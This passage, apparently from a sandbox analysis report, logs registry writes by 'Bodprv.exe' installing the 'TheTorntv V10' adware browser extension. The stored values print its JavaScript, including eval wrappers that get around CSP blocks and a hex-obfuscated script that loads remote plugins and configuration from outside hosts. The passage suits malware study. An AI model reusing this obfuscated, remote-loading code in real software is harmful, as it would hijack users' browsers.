"pf\",\"pg\",\"ph\",\"pk\",\"pl\",\"pm\",\"pn\",\"pr\",\"pro\",\"ps\",\"pt\",\"pw\",\"py\",\"qa\",\"re\",\"ro\",\"rs\",\"ru\",\"rw\",\"sa\",\"sb\",\"sc\",\"sd\",\"se\",\"sg\",\"sh\",\"si\",\"sj\",\"sk\",\"sl\",\"sm\",\"sn\",\"so\",\"sr\",\"st\",\"su\",\"sv\",\"sy\",\"sz\",\"tc\",\"td\",\"tel\",\"tf\",\"tg\",\"th\",\"tj\",\"tk\",\"tl\",\"tm\",\"tn\",\"to\",\"tp\",\"tr\",\"travel\",\"tt\",\"tv\",\"tw\",\"tz\",\"ua\",\"ug\",\"uk\",\"us\",\"uy\",\"uz\",\"va\",\"vc\",\"ve\",\"vg\",\"vi\",\"vn\",\"vu\",\"wf\",\"ws\",\"xn--0zwm56d\",\"xn--11b5bs3a9aj6g\",\"xn--3e0b707e\",\"xn--45brj9c\",\"xn--80akhbyknj4f\",\"xn--90a3ac\",\"xn--9t4b11yi5a\",\"xn--clchc0ea0b2g2a9gcd\",\"xn--deba0ad\",\"xn--fiqs8s\",\"xn--fiqz9s\",\"xn--fpcrj9c3d\",\"xn--fzc2c9e2c\",\"xn--g6w251d\",\"xn--gecrj9c\",\"xn--h2brj9c\",\"xn--hgbk6aj7f53bba\",\"xn--hlcj6aya9esc7a\",\"xn--j6w193g\",\"xn--jxalpdlp\",\"xn--kgbechtv\",\"xn--kprw13d\",\"xn--kpry57d\",\"xn--lgbbat1ad8j\",\"xn--mgbaam7a8h\",\"xn--mgbayh7gpa\",\"xn--mgbbh1a71e\",\"xn--mgbc0a9azcg\",\"xn--mgberp4a5d4ar\",\"xn--o3cw4h\",\"xn--ogbpf8fl\",\"xn--p1ai\",\"xn--pgbs0dh\",\"xn--s9brj9c\",\"xn--wgbh1c\",\"xn--wgbl6a\",\"xn--xkc2al3hye2a\",\"xn--xkc2dl3a5ee0h\",\"xn--yfro4i67o\",\"xn--ygbi2ammx\",\"xn--zckzah\",\"xxx\",\"ye\",\"yt\",\"za\",\"zm\",\"zw\"].join();return function(url){var parts,part,tldLevelsChecked;host=appAPI.utils.getHost(url);parts=host.split(\".\");if(parts[0]===\"www\"&&parts[1]!==\"com\"){parts.shift();}while(parts.length>0){part=parts.pop();tldLevelsChecked++;if(tldLevelsChecked>2||appAPI.utils.indexOf(TLDs,part)<0){break;}}return part;};}());appAPI.utils.newFunction=function(code){try{return new Function(code);}catch(e){if(appAPI.platform==\"FF\"&&e.message.indexOf(\"blocked by CSP\")>-1&&FFInternal&&typeof FFInternal.newFunction===\"function\"){return FFInternal.newFunction(code);}}};appAPI.utils.eval=eval;if(appAPI.platform===\"FF\"){try{eval(\"var testEval = true;\");}catch(e){appAPI.utils.eval=function(code,scope){if(e.message.indexOf(\"blocked by CSP\")>-1&&FFInternal&&typeof FFInternal.newFunction===\"function\"){var foo=FFInternal.newFunction(code);if(scope){foo.call(scope);return;}foo();}};}}appAPI.utils.trim=function(str){if(!appAPI.utils.isString(str)){return str;}if(typeof str.trim===\"function\"){return str.trim();}else{return str.replace(/^\\s+|\\s+$/g,\"\");}};}());(function(){appAPI.utils.Base64={_keyStr:\"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=\",encode:function(c){var a=\"\";var k,h,f,j,g,e,d;var b=0;c=appAPI.utils.Base64._utf8_encode(c);while(b<c.length){k=c.charCodeAt(b++);h=c.charCodeAt(b++);f=c.charCodeAt(b++);j=k>>2;g=((k&3)<<4)|(h>>4);e=((h&15)<<2)|(f>>6);d=f&63;if(isNaN(h)){e=d=64;}else{if(isNaN(f)){d=64;}}a=a+this._keyStr.charAt(j)+this._keyStr.charAt(g)+this._keyStr.charAt(e)+this._keyStr.charAt(d);}return a;},decode:function(c){var a=\"\";var k,h,f;var j,g,e,d;var b=0;c=c.replace(/[^A-Za-z0-9\\+\\/\\=]/g,\"\");while(b<c.length){j=this._keyStr.indexOf(c.charAt(b++));g=this._keyStr.indexOf(c.charAt(b++));e=this._keyStr.indexOf(c.charAt(b++));d=this._keyStr.indexOf(c.charAt(b++));k=(j<<2)|(g>>4);h=((g&15)<<4)|(e>>2);f=((e&3)<<6)|d;a=a+String.fromCharCode(k);if(e!=64){a=a+String.fromCharCode(h);}if(d!=64){a=a+String.fromCharCode(f);}}a=appAPI.utils.Base64._utf8_decode(a);return a;},_utf8_encode:function(b){b=b.replace(/\\r\\n/g,\"\\n\");var a=\"\";for(var e=0;e<b.length;e++){var d=b.charCodeAt(e);if(d<128){a+=String.fromCharCode(d);}else{if((d>127)&&(d<2048)){a+=String.fromCharCode((d>>6)|192);a+=String.fromCharCode((d&63)|128);}else{a+=String.fromCharCode((d>>12)|224);a+=String.fromCharCode(((d>>6)&63)|128);a+=String.fromCharCode((d&63)|128);}}}return a;},_utf8_decode:function(a){var b=\"\";var d=0;var e=c1=c2=0;while(d<a.length){e=a.charCodeAt(d);if(e<128){b+=String.fromCharCode(e);d++;}else{if((e>191)&&(e<224)){c2=a.charCodeAt(d+1);b+=String.fromCharCode(((e&31)<<6)|(c2&63));d+=2;}else{c2=a.charCodeAt(d+1);c3=a.charCodeAt(d+2);b+=String.fromCharCode(((e&15)<<12)|((c2&63)<<6)|(c3&63));d+=3;}}}return b;}};})();(function(){function a(b){if(appAPI[b]){return appAPI[b];}return function(){var c=Array.prototype.slice.call(arguments,0);return window[b].apply(window,c);};}appAPI.setTimeout=a(\"setTimeout\");appAPI.setInterval=a(\"setInterval\");appAPI.clearTimeout=a(\"clearTimeout\");appAPI.clearInterval=a(\"clearInterval\");}());(function(){appAPI.utils.MD5=(function(){var q=0;var y=\"\";function p(B){return z(n(r(B)));}function o(B){return b(n(r(B)));}function i(B,C){return e(n(r(B)),C);}function w(B,C){return z(g(r(B),r(C)));}function l(B,C){return b(g(r(B),r(C)));}function h(B,D,C){return e(g(r(B),r(D)),C);}function A(){return p(\"abc\").toLowerCase()==\"900150983cd24fb0d6963f7d28e17f72\";}function n(B){return u(f(m(B),B.length*8));}function g(D,G){var F=m(D);if(F.length>16){F=f(F,D.length*8);}var B=Array(16),E=Array(16);for(var C=0;C<16;C++){B[C]=F[C]^909522486;E[C]=F[C]^1549556828;}var H=f(B.concat(m(G)),512+G.length*8);return u(f(E.concat(H),512+128));}function z(D){if(typeof q===\"undefined\"){q=0;}var F=q?\"0123456789ABCDEF\":\"0123456789abcdef\";var C=\"\";var B;for(var E=0;E<D.length;E++){B=D.charCodeAt(E);C+=F.charAt((B>>>4)&15)+F.charAt(B&15);}return C;}function b(D){if(typeof y===\"undefined\"){y=\"\";}var G=\"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\";var C=\"\";var B=D.length;for(var F=0;F<B;F+=3){var H=(D.charCodeAt(F)<<16)|(F+1<B?D.charCodeAt(F+1)<<8:0)|(F+2<B?D.charCodeAt(F+2):0);for(var E=0;E<4;E++){if(F*8+E*6>D.length*8){C+=y;}else{C+=G.charAt((H>>>6*(3-E))&63);}}}return C;}function e(L,D){var C=D.length;var K,G,B,M,F;var J=Array(Math.ceil(L.length/2));for(K=0;K<J.length;K++){J[K]=(L.charCodeAt(K*2)<<8)|L.charCodeAt(K*2+1);}var I=Math.ceil(L.length*8/(Math.log(D.length)/Math.log(2)));var H=Array(I);for(G=0;G<I;G++){F=Array();M=0;for(K=0;K<J.length;K++){M=(M<<16)+J[K];B=Math.floor(M/C);M-=B*C;if(F.length>0||B>0){F[F.length]=B;}}H[G]=M;J=F;}var E=\"\";for(K=H.length-1;K>=0;K--){E+=D.charAt(H[K]);}return E;}function r(D){var C=\"\";var E=-1;var B,F;while(++E<D.length){B=D.charCodeAt(E);F=E+1<D.length?D.charCodeAt(E+1):0;if(55296<=B&&B<=56319&&56320<=F&&F<=57343){B=65536+((B&1023)<<10)+(F&1023);E++;}if(B<=127){C+=String.fromCharCode(B);}else{if(B<=2047){C+=String.fromCharCode(192|((B>>>6)&31),128|(B&63));}else{if(B<=65535){C+=String.fromCharCode(224|((B>>>12)&15),128|((B>>>6)&63),128|(B&63));}else{if(B<=2097151){C+=String.fromCharCode(240|((B>>>18)&7),128|((B>>>12)&63),128|((B>>>6)&63),128|(B&63));}}}}}return C;}function v(C){var B=\"\";for(var D=0;D<C.length;D++){B+=String.fromCharCode(C.charCodeAt(D)&255,(C.charCodeAt(D)>>>8)&255);}return B;}function k(C){var B=\"\";for(var D=0;D<C.length;D++){B+=String.fromCharCode((C.charCodeAt(D)>>>8)&255,C.charCodeAt(D)&255);}return B;}function m(C){var B=Array(C.length>>2);for(var D=0;D<B.length;D++){B[D]=0;}for(var D=0;D<C.length*8;D+=8){B[D>>5]|=(C.charCodeAt(D/8)&255)<<(D%32);}return B;}function u(C){var B=\"\";for(var D=0;D<C.length*32;D+=8){B+=String.fromCharCode((C[D>>5]>>>(D%32))&255);}return B;}function f(L,G){L[G>>5]|=128<<((G)%32);L[(((G+64)>>>9)<<4)+14]=G;var K=1732584193;var J=-271733879;var I=-1732584194;var H=271733878;for(var D=0;D<L.length;D+=16){var F=K;var E=J;var C=I;var B=H;K=c(K,J,I,H,L[D+0],7,-680876936);H=c(H,K,J,I,L[D+1],12,-389564586);I=c(I,H,K,J,L[D+2],17,606105819);J=c(J,I,H,K,L[D+3],22,-1044525330);K=c(K,J,I,H,L[D+4],7,-176418897);H=c(H,K,J,I,L[D+5],12,1200080426);I=c(I,H,K,J,L[D+6],17,-1473231341);J=c(J,I,H,K,L[D+7],22,-45705983);K=c(K,J,I,H,L[D+8],7,1770035416);H=c(H,K,J,I,L[D+9],12,-1958414417);I=c(I,H,K,J,L[D+10],17,-42063);J=c(J,I,H,K,L[D+11],22,-1990404162);K=c(K,J,I,H,L[D+12],7,1804603682);H=c(H,K,J,I,L[D+13],12,-40341101);I=c(I,H,K,J,L[D+14],17,-1502002290);J=c(J,I,H,K,L[D+15],22,1236535329);K=j(K,J,I,H,L[D+1],5,-165796510);H=j(H,K,J,I,L[D+6],9,-1069501632);I=j(I,H,K,J,L[D+11],14,643717713);J=j(J,I,H,K,L[D+0],20,-373897302);K=j(K,J,I,H,L[D+5],5,-701558691);H=j(H,K,J,I,L[D+10],9,38016083);I=j(I,H,K,J,L[D+15],14,-660478335);J=j(J,I,H,K,L[D+4],20,-405537848);K=j(K,J,I,H,L[D+9],5,568446438);H=j(H,K,J,I,L[D+14],9,-1019803690);I=j(I,H,K,J,L[D+3],14,-187363961);J=j(J,I,H,K,L[D+8],20,1163531501);K=j(K,J,I,H,L[D+13],5,-1444681467);H=j(H,K,J,I,L[D+2],9,-51403784);I=j(I,H,K,J,L[D+7],14,1735328473);J=j(J,I,H,K,L[D+12],20,-1926607734);K=t(K,J,I,H,L[D+5],4,-378558);H=t(H,K,J,I,L[D+8],11,-2022574463);I=t(I,H,K,J,L[D+11],16,1839030562);J=t(J,I,H,K,L[D+14],23,-35309556);K=t(K,J,I,H,L[D+1],4,-1530992060);H=t(H,K,J,I,L[D+4],11,1272893353);I=t(I,H,K,J,L[D+7],16,-155497632);J=t(J,I,H,K,L[D+10],23,-1094730640);K=t(K,J,I,H,L[D+13],4,681279174);H=t(H,K,J,I,L[D+0],11,-358537222);I=t(I,H,K,J,L[D+3],16,-722521979);J=t(J,I,H,K,L[D+6],23,76029189);K=t(K,J,I,H,L[D+9],4,-640364487);H=t(H,K,J,I,L[D+12],11,-421815835);I=t(I,H,K,J,L[D+15],16,530742520);J=t(J,I,H,K,L[D+2],23,-995338651);K=a(K,J,I,H,L[D+0],6,-198630844);H=a(H,K,J,I,L[D+7],10,1126891415);I=a(I,H,K,J,L[D+14],15,-1416354905);J=a(J,I,H,K,L[D+5],21,-57434055);K=a(K,J,I,H,L[D+12],6,1700485571);H=a(H,K,J,I,L[D+3],10,-1894986606);I=a(I,H,K,J,L[D+10],15,-1051523);J=a(J,I,H,K,L[D+1],21,-2054922799);K=a(K,J,I,H,L[D+8],6,1873313359);H=a(H,K,J,I,L[D+15],10,-30611744);I=a(I,H,K,J,L[D+6],15,-1560198380);J=a(J,I,H,K,L[D+13],21,1309151649);K=a(K,J,I,H,L[D+4],6,-145523070);H=a(H,K,J,I,L[D+11],10,-1120210379);I=a(I,H,K,J,L[D+2],15,718787259);J=a(J,I,H,K,L[D+9],21,-343485551);K=s(K,F);J=s(J,E);I=s(I,C);H=s(H,B);}return Array(K,J,I,H);}function d(G,D,C,B,F,E){return s(x(s(s(D,G),s(B,E)),F),C);}function c(D,C,H,G,B,F,E){return d((C&H)|((~C)&G),D,C,B,F,E);}function j(D,C,H,G,B,F,E){return d((C&G)|(H&(~G)),D,C,B,F,E);}function t(D,C,H,G,B,F,E){return d(C^H^G,D,C,B,F,E);}function a(D,C,H,G,B,F,E){return d(H^(C|(~G)),D,C,B,F,E);}function s(B,E){var D=(B&65535)+(E&65535);var C=(B>>16)+(E>>16)+(D>>16);return(C<<16)|(D&65535);}function x(B,C){return(B<<C)|(B>>>(32-C));}return{encode:p};}());}());\n" Bodprv.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\TheTorntv V10\Plugins\93 Bodprv.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\TheTorntv V10\Plugins\2\JavaScript = "\n(function(){var b=\"dummy so this plugin won't be empty\";})();\n" Bodprv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78} GoogleUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\globalUpdateUpdate.Update3WebMachineFallback\CurVer\ = "globalUpdateUpdate.Update3WebMachineFallback.1.0" GoogleUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\globalUpdateUpdate.Update3WebMachine GoogleUpdate.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\TheTorntv V10\Manifest\UpdateInterval = "360" Bodprv.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\TheTorntv V10\Manifest\SetNewTab = "false" Bodprv.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\TheTorntv V10\Plugins\220 Bodprv.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\TheTorntv V10\Plugins\91\Url = "http://js.newinfoclientstack.com/plugins/mins/91.js" Bodprv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{555D7146-94A8-4C94-AE76-C39CDC7F7705}\ProxyStubClsid32 GoogleUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\globalUpdateUpdate.Update3WebMachine.1.0\ = "Google Update Broker Class Factory" GoogleUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\globalUpdateUpdate.Update3WebMachine\CurVer GoogleUpdate.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\TheTorntv V10\Plugins\1\JavaScript = "\nvar __a0__=[\"\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x77\\x39\\x75\\x36\\x61\\x32\\x70\\x36\",\"\\x2e\\x73\\x73\\x6c\\x2e\\x68\\x77\\x63\\x64\\x6e\\x2e\\x6e\\x65\\x74\"].join(\"\");var __a1__=[\"\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x74\",\"\\x61\\x67\\x69\\x6e\\x67\\x2d\\x61\\x70\\x70\",\"\\x2e\\x63\\x72\\x6f\\x73\\x73\\x72\\x69\\x64\",\"\\x65\\x72\\x2e\\x63\\x6f\\x6d\"].join(\"\");var __a2__=[\"\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x77\\x39\\x75\",\"\\x36\\x61\\x32\\x70\\x36\\x2e\\x73\\x73\\x6c\\x2e\\x68\",\"\\x77\\x63\\x64\\x6e\\x2e\\x6e\\x65\\x74\"].join(\"\");var __a3__=[\"\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\",\"\\x73\\x74\\x61\\x67\\x69\\x6e\\x67\",\"\\x2d\\x61\\x70\\x70\\x2e\\x63\\x72\",\"\\x6f\\x73\\x73\\x72\\x69\\x64\\x65\",\"\\x72\\x2e\\x63\\x6f\\x6d\"].join(\"\");var __a4__=[\"\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6e\\x73\\x74\",\"\\x61\\x74\\x73\\x2e\\x63\\x72\\x6f\\x73\\x73\\x72\",\"\\x69\\x64\\x65\\x72\\x2e\\x63\\x6f\\x6d\"].join(\"\");var __a5__=[\"\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x74\",\"\\x61\\x67\\x69\\x6e\\x67\\x2d\\x61\\x70\\x70\",\"\\x2e\\x63\\x72\\x6f\\x73\\x73\\x72\\x69\\x64\",\"\\x65\\x72\\x2e\\x63\\x6f\\x6d\"].join(\"\");var __a6__=[\"\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x72\",\"\\x65\\x73\\x6f\\x75\\x72\\x63\\x65\\x73\",\"\\x2e\\x63\\x72\\x6f\\x73\\x73\\x72\\x69\",\"\\x64\\x65\\x72\\x2e\\x63\\x6f\\x6d\"].join(\"\");var __a7__=[\"\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\",\"\\x73\\x74\\x61\\x67\\x69\\x6e\\x67\",\"\\x2d\\x61\\x70\\x70\\x2e\\x63\\x72\",\"\\x6f\\x73\\x73\\x72\\x69\\x64\\x65\",\"\\x72\\x2e\\x63\\x6f\\x6d\"].join(\"\");var _0xbc3d=[\"\\x5F\\x63\\x72\\x5F\\x63\\x6F\\x6E\\x66\\x69\\x67\",\"\\x61\\x70\\x70\\x49\\x6E\\x66\\x6F\",\"\\x69\\x64\",\"\\x61\\x70\\x70\\x49\\x44\",\"\\x2F\\x70\\x6C\\x75\\x67\\x69\\x6E\\x73\\x2F\\x73\\x74\\x79\\x6C\\x65\\x73\\x68\\x65\\x65\\x74\\x73\\x2F\\x73\\x69\\x64\\x65\\x62\\x61\\x72\\x2E\\x63\\x73\\x73\",\"\\x2F\\x70\\x6C\\x75\\x67\\x69\\x6E\\x73\\x2F\\x69\\x6D\\x61\\x67\\x65\\x73\\x2F\\x73\\x69\\x64\\x65\\x62\\x61\\x72\",\"\\x65\\x78\\x74\\x65\\x6E\\x64\",\"\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x77\\x77\\x77\\x2E\\x67\\x65\\x6F\\x70\\x6C\\x75\\x67\\x69\\x6E\\x2E\\x6E\\x65\\x74\\x2F\\x6A\\x73\\x6F\\x6E\\x2E\\x67\\x70\\x3F\\x6A\\x73\\x6F\\x6E\\x63\\x61\\x6C\\x6C\\x62\\x61\\x63\\x6B\\x3D\\x66\\x6E\",\"\\x2F\\x6E\\x6F\\x74\\x69\\x66\\x69\\x65\\x72\\x2F\",\"\\x2F\\x6D\\x65\\x74\\x61\\x2E\\x6A\\x73\\x6F\\x6E\",\"\\x2F\\x7B\\x69\\x64\\x7D\\x2E\\x6A\\x73\\x6F\\x6E\",\"\\x2F\\x6E\\x6F\\x74\\x69\\x66\\x69\\x63\\x61\\x74\\x69\\x6F\\x6E\\x73\\x2E\\x67\\x69\\x66\",\"\\x2F\\x61\\x70\\x69\\x5F\\x6E\\x6F\\x74\\x69\\x66\\x69\\x63\\x61\\x74\\x69\\x6F\\x6E\\x73\\x2E\\x67\\x69\\x66\",\"\\x2F\\x70\\x6C\\x75\\x67\\x69\\x6E\\x73\\x2F\\x73\\x74\\x79\\x6C\\x65\\x73\\x68\\x65\\x65\\x74\\x73\\x2F\\x6E\\x6F\\x74\\x69\\x66\\x69\\x63\\x61\\x74\\x69\\x6F\\x6E\\x73\\x2E\\x63\\x73\\x73\",\"\\x2F\\x70\\x6C\\x75\\x67\\x69\\x6E\\x73\\x2F\\x69\\x6D\\x61\\x67\\x65\\x73\\x2F\\x6E\\x6F\\x74\\x69\\x66\\x69\\x63\\x61\\x74\\x69\\x6F\\x6E\\x73\",\"\\x63\\x72\\x6F\\x73\\x73\\x72\\x69\\x64\\x65\\x72\\x2E\\x63\\x6F\\x6D\",\"\\x73\\x74\\x61\\x67\\x69\\x6E\\x67\\x2E\\x63\\x72\\x6F\\x73\\x73\\x72\\x69\\x64\\x65\\x72\\x2E\\x63\\x6F\\x6D\",\"\\x68\\x74\\x74\\x70\\x73\\x3A\\x2F\\x2F\\x61\\x6A\\x61\\x78\\x2E\\x67\\x6F\\x6F\\x67\\x6C\\x65\\x61\\x70\\x69\\x73\\x2E\\x63\\x6F\\x6D\\x2F\\x61\\x6A\\x61\\x78\\x2F\\x6C\\x69\\x62\\x73\\x2F\\x6A\\x71\\x75\\x65\\x72\\x79\\x2F\\x7B\\x76\\x65\\x72\\x73\\x69\\x6F\\x6E\\x7D\\x2F\\x6A\\x71\\x75\\x65\\x72\\x79\\x2E\\x6D\\x69\\x6E\\x2E\\x6A\\x73\",\"\\x68\\x74\\x74\\x70\\x73\\x3A\\x2F\\x2F\\x61\\x6A\\x61\\x78\\x2E\\x67\\x6F\\x6F\\x67\\x6C\\x65\\x61\\x70\\x69\\x73\\x2E\\x63\\x6F\\x6D\\x2F\\x61\\x6A\\x61\\x78\\x2F\\x6C\\x69\\x62\\x73\\x2F\\x6A\\x71\\x75\\x65\\x72\\x79\\x75\\x69\\x2F\\x7B\\x76\\x65\\x72\\x73\\x69\\x6F\\x6E\\x7D\\x2F\\x6A\\x71\\x75\\x65\\x72\\x79\\x2D\\x75\\x69\\x2E\\x6D\\x69\\x6E\\x2E\\x6A\\x73\",\"\\x68\\x74\\x74\\x70\\x73\\x3A\\x2F\\x2F\\x61\\x6A\\x61\\x78\\x2E\\x67\\x6F\\x6F\\x67\\x6C\\x65\\x61\\x70\\x69\\x73\\x2E\\x63\\x6F\\x6D\\x2F\\x61\\x6A\\x61\\x78\\x2F\\x6C\\x69\\x62\\x73\\x2F\\x6A\\x71\\x75\\x65\\x72\\x79\\x75\\x69\\x2F\\x7B\\x76\\x65\\x72\\x73\\x69\\x6F\\x6E\\x7D\\x2F\\x74\\x68\\x65\\x6D\\x65\\x73\\x2F\\x7B\\x74\\x68\\x65\\x6D\\x65\\x7D\\x2F\\x6A\\x71\\x75\\x65\\x72\\x79\\x2D\\x75\\x69\\x2E\\x63\\x73\\x73\",\"\\x2F\\x61\\x70\\x70\\x73\\x2F\\x7B\\x61\\x70\\x70\\x49\\x64\\x7D\\x2F\\x72\\x65\\x73\\x6F\\x75\\x72\\x63\\x65\\x73\\x2F\\x6D\\x65\\x74\\x61\\x2F\\x7B\\x6C\\x61\\x73\\x74\\x56\\x65\\x72\\x73\\x69\\x6F\\x6E\\x7D\",\"\\x74\\x65\\x73\\x74\",\"\\x43\\x6C\\x61\\x73\\x73\",\"\\x69\\x6E\\x69\\x74\",\"\\x61\\x70\\x70\\x6C\\x79\",\"\\x70\\x72\\x6F\\x74\\x6F\\x74\\x79\\x70\\x65\",\"\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\",\"\\x5F\\x73\\x75\\x70\\x65\\x72\",\"\\x63\\x6F\\x6E\\x73\\x74\\x72\\x75\\x63\\x74\\x6F\\x72\",\"\\x63\\x61\\x6C\\x6C\\x65\\x65\",\"\\x69\\x73\\x4D\\x61\\x74\\x63\\x68\\x50\\x61\\x67\\x65\\x73\",\"\",\"\\x73\\x74\\x72\\x69\\x6E\\x67\",\"\\x5E\\x68\\x74\\x74\\x70\\x2E\\x3F\\x5C\\x3A\\x5C\\x2F\\x5C\\x2F\\x28\\x3F\\x3A\\x77\\x77\\x77\\x5C\\x2E\\x29\\x3F\",\"\\x2E\\x2A\",\"\\x72\\x65\\x70\\x6C\\x61\\x63\\x65\",\"\\x5C\\x2E\",\"\\x5C\\x5C\",\"\\x69\",\"\\x6C\\x6F\\x63\\x61\\x74\\x69\\x6F\\x6E\",\"\\x64\\x6F\\x6D\",\"\\x75\\x6E\\x64\\x65\\x66\\x69\\x6E\\x65\\x64\",\"\\x68\\x72\\x65\\x66\",\"\\x65\\x61\\x63\\x68\",\"\\x6D\\x61\\x6B\\x65\\x41\\x72\\x72\\x61\\x79\",\"\\x69\\x6E\\x69\\x74\\x42\\x61\\x73\\x65\\x43\\x72\\x6F\\x73\\x73\\x72\\x69\\x64\\x65\\x72\\x4A\\x51\\x75\\x65\\x72\\x79\\x50\\x6C\\x75\\x67\\x69\\x6E\\x73\",\"\\x69\\x6E\\x74\\x65\\x72\\x6E\\x61\\x6C\",\"\\x61\\x64\\x64\\x42\\x61\\x73\\x65\\x43\\x6C\\x61\\x73\\x73\",\"\\x66\\x6E\",\"\\x20\",\"\\x73\\x70\\x6C\\x69\\x74\",\"\\x63\\x6C\\x61\\x73\\x73\",\"\\x61\\x74\\x74\\x72\",\"\\x66\\x69\\x72\\x65\\x45\\x78\\x74\\x65\\x6E\\x73\\x69\\x6F\\x6E\\x45\\x76\\x65\\x6E\\x74\",\"\\x73\\x74\\x72\\x69\\x6E\\x67\\x69\\x66\\x79\",\"\\x4A\\x53\\x4F\\x4E\",\"\\x5F\\x5F\\x63\\x72\\x6F\\x73\\x73\\x72\\x69\\x64\\x65\\x72\\x5F\\x65\\x6D\\x70\\x74\\x79\",\"\\x63\\x72\\x6F\\x73\\x73\\x72\\x69\\x64\\x65\\x72\\x5F\\x64\\x61\\x74\\x61\\x5F\\x73\\x74\\x6F\\x72\\x65\\x5F\\x74\\x65\\x6D\\x70\",\"\\x73\\x65\\x74\\x41\\x74\\x74\\x72\\x69\\x62\\x75\\x74\\x65\",\"\\x6D\\x73\\x69\\x65\",\"\\x62\\x72\\x6F\\x77\\x73\\x65\\x72\",\"\\x66\\x61\\x6B\\x65\\x5F\",\"\\x72\\x61\\x6E\\x64\\x6F\\x6D\",\"\\x63\\x72\\x65\\x61\\x74\\x65\\x45\\x76\\x65\\x6E\\x74\",\"\\x45\\x76\\x65\\x6E\\x74\\x73\",\"\\x69\\x6E\\x69\\x74\\x45\\x76\\x65\\x6E\\x74\",\"\\x64\\x69\\x73\\x70\\x61\\x74\\x63\\x68\\x45\\x76\\x65\\x6E\\x74\",\"\\x62\\x69\\x6E\\x64\\x45\\x78\\x74\\x65\\x6E\\x73\\x69\\x6F\\x6E\\x45\\x76\\x65\\x6E\\x74\",\"\\x70\\x61\\x72\\x73\\x65\\x4A\\x53\\x4F\\x4E\",\"\\x61\\x74\\x74\\x61\\x63\\x68\\x45\\x76\\x65\\x6E\\x74\",\"\\x6F\\x6E\\x70\\x72\\x6F\\x70\\x65\\x72\\x74\\x79\\x63\\x68\\x61\\x6E\\x67\\x65\",\"\\x70\\x72\\x6F\\x70\\x65\\x72\\x74\\x79\\x4E\\x61\\x6D\\x65\",\"\\x66\\x69\\x78\",\"\\x65\\x76\\x65\\x6E\\x74\",\"\\x63\\x61\\x6C\\x6C\",\"\\x70\\x72\\x6F\\x78\\x79\",\"\\x61\\x64\\x64\\x45\\x76\\x65\\x6E\\x74\\x4C\\x69\\x73\\x74\\x65\\x6E\\x65\\x72\"];appAPI[_0xbc3d[0]]={appID:function(){var a=appAPI[_0xbc3d[1]];if(a){return appAPI[_0xbc3d[1]][_0xbc3d[2]];}else{return appAPI[_0xbc3d[3]];}}};$jquery[_0xbc3d[6]](appAPI._cr_config,{sidebar:{base:{production:__a0__,staging:__a1__},css:_0xbc3d[4],themes:_0xbc3d[5]}});$jquery[_0xbc3d[6]](appAPI._cr_config,{notifications_manager:{base:{production:__a2__,staging:__a3__},statsBase:{production:__a4__,staging:__a5__},geolocation:_0xbc3d[7],meta:_0xbc3d[8]+appAPI[_0xbc3d[0]][_0xbc3d[3]]()+_0xbc3d[9],messages:_0xbc3d[8]+appAPI[_0xbc3d[0]][_0xbc3d[3]]()+_0xbc3d[10],logger:_0xbc3d[11],loggerAPI:_0xbc3d[12]},notifications:{base:{production:__a2__,staging:__a3__},css:_0xbc3d[13],themes:_0xbc3d[14]}});$jquery[_0xbc3d[6]](appAPI._cr_config,{debug_app:{debug_page:[_0xbc3d[15],_0xbc3d[16]]}});$jquery[_0xbc3d[6]](appAPI._cr_config,{resources:{jQuery:{url:_0xbc3d[17],cacheTime:10},jQueryUI:{url:_0xbc3d[18],theme:_0xbc3d[19],cacheTime:10},base:{production:__a6__,staging:__a7__},update:_0xbc3d[20]}});(function(c){var b=!1,a=/xyz/[_0xbc3d[21]](function(){})?/\\b_super\\b/:/.*/;c[_0xbc3d[22]]=function(){};c[_0xbc3d[22]][_0xbc3d[6]]=function(g){function f(){!b&&this[_0xbc3d[23]]&&this[_0xbc3d[23]][_0xbc3d[24]](this,arguments);}var h=this[_0xbc3d[25]];b=!0;var e=new this;b=!1;for(var d in g){e[d]=_0xbc3d[26]==typeof 